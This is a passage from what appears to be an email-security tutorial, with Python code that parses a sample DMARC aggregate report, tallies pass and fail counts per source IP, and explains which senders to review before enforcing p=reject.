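      <spf><domain>bulk.example</domain><result>pass</result></spf>
    </auth_results>
  </record>
</feedback>
"""


def summarize_report(xml_text):
    """Return the published policy and per-source pass/fail message counts."""
    root = ET.fromstring(xml_text)
    policy = {child.tag: child.text for child in root.find("policy_published")}
    sources = {}
    for record in root.findall("record"):
        row = record.find("row")
        ip = row.findtext("source_ip")
        count = int(row.findtext("count"))
        evaluated = row.find("policy_evaluated")
        # policy_evaluated holds the *aligned* results; DMARC passes if either does.
        dmarc_pass = "pass" in (evaluated.findtext("dkim"), evaluated.findtext("spf"))
        entry = sources.setdefault(ip, {"pass": 0, "fail": 0, "spf_domains": set()})
        entry["pass" if dmarc_pass else "fail"] += count
        # Record which domain the envelope sender used; a mismatch with the
        # header From domain is how a third-party sender shows up in reports.
        for spf in record.find("auth_results").findall("spf"):
            entry["spf_domains"].add(spf.findtext("domain"))
    return {"policy": policy, "sources": sources}


def failing_sources(summary, min_count=1):
    """IPs that sent at least min_count messages failing DMARC; review before p=reject."""
    return sorted(ip for ip, e in summary["sources"].items() if e["fail"] >= min_count)


def totals(summary):
    """(messages passing DMARC, messages failing DMARC) across all sources."""
    passed = sum(e["pass"] for e in summary["sources"].values())
    failed = sum(e["fail"] for e in summary["sources"].values())
    return passed, failed


if __name__ == "__main__":
    s = summarize_report(SAMPLE_RUA_XML)
    print("policy:", s["policy"]["p"], "pass/fail:", totals(s), "review:", failing_sources(s))
```

Reading the constructed report the way the paragraph suggests: `203.0.113.10` is the domain's own mail server and passes cleanly; `192.0.2.44` passes only through aligned DKIM while its SPF domain is `bulk.example`, which is the kind of legitimate third-party sender you would add to your SPF or DKIM setup before ramping up enforcement; `198.51.100.7` fails both checks and is the traffic that a move from `p=none` to `p=reject` would stop.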